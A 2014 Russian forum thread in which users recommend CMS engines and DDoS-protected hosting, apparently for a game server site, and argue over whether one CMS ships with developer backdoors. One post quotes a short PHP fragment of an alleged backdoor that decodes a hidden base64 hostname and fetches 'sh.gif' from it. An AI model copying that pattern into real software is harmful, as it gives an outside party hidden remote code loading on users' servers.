Pzychozes 15 Опубликовано 22 января, 2014 Всем привет, собственное нужен совет от знающих людей. Посоветуйте CMS (stress что-то я побаиваюсь брать. советуют ghtweb, но я хз, так как он бесплатный, не улечу ли я с ним в помойку?) Хостинг с защитой от DDoS (не дорогой, для сайта. сервер на локалке стоит.) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
masone 298 Опубликовано 22 января, 2014 (изменено) ghtweb ( бесплатный и открытый ) верти и крути как хочешь,или как вариант RulWeb (открытый и платный) но тоже не плохой! На аверии стоит можешь потестить штормы или пм\ддг Изменено 22 января, 2014 пользователем masone Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Airo 88 Опубликовано 22 января, 2014 Смотря для какого сервера и СВ нор обвязка если это лицуха и нету шелов Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 22 января, 2014 На рулвеб можно ссылочку? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 22 января, 2014 Смотря для какого сервера и СВ нор обвязка если это лицуха и нету шелов Даже в лицухе есть шеллы. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Andis 117 Опубликовано 22 января, 2014 (изменено) Даже в лицухе есть шеллы. Бред, бредом. Ломают стресс только в том случае, когда админ криворукий. Изменено 22 января, 2014 пользователем Andis Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
DRIADchik 44 Опубликовано 22 января, 2014 Бред, бредом. Ломают стресс только в том случае, когда админ криворукий. Бред, бредом. Шеллы есть от разработчика! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 22 января, 2014 Бред, бредом. Ломают стресс только в том случае, когда админ криворукий. Идиот, в sw есть шеллы от разработчика. Это было уже не раз доказано. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 22 января, 2014 Всем привет, собственное нужен совет от знающих людей. Посоветуйте CMS (stress что-то я побаиваюсь брать. советуют ghtweb, но я хз, так как он бесплатный, не улечу ли я с ним в помойку?) Хостинг с защитой от DDoS (не дорогой, для сайта. сервер на локалке стоит.) Ребят, всё ещё актуально! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
danilz 38 Опубликовано 22 января, 2014 rulweb.ru Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 22 января, 2014 rulweb.ru Написал админу на форуме в лс, но толку 0. Да и форум пустой. Есть ещё варианты нормальных cms? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Andis 117 Опубликовано 22 января, 2014 Идиот, в sw есть шеллы от разработчика. Это было уже не раз доказано. Покупаешь лицуху и у тебя не будет проблем. Обсуди эту тему на ZG Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Spark 2 Опубликовано 24 января, 2014 Что св, что гхт сейчас нормальные cms. Стрес слишком хорошо защитил свою цмс, да и он дорожит своей репутацией, а на мнение школьников, что ололол там шелы ему пофиг. Ясное дело школьники привыкли юзать шару, вот им и шелы. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
4ekist 106 Опубликовано 24 января, 2014 Являюсь клиентом rulweb.ru могу продать клиентку ! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 24 января, 2014 Являюсь клиентом rulweb.ru могу продать клиентку ! Писал админу, он молчит. А через левые руки брать ничего не намерен. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pzychozes 15 Опубликовано 24 января, 2014 Что св, что гхт сейчас нормальные cms. Стрес слишком хорошо защитил свою цмс, да и он дорожит своей репутацией, а на мнение школьников, что ололол там шелы ему пофиг. Ясное дело школьники привыкли юзать шару, вот им и шелы. Если инфа правдива, был подобный шелл от разработчика. private function shBody(){ return file_get_contents($this->EncodeString($this->shHostname, 'base64dec'). 'sh.gif'); } Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
4ekist 106 Опубликовано 24 января, 2014 Писал админу, он молчит. А через левые руки брать ничего не намерен. Я Вам и предлагаю через разработчиков переписать на Вас клиента ! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты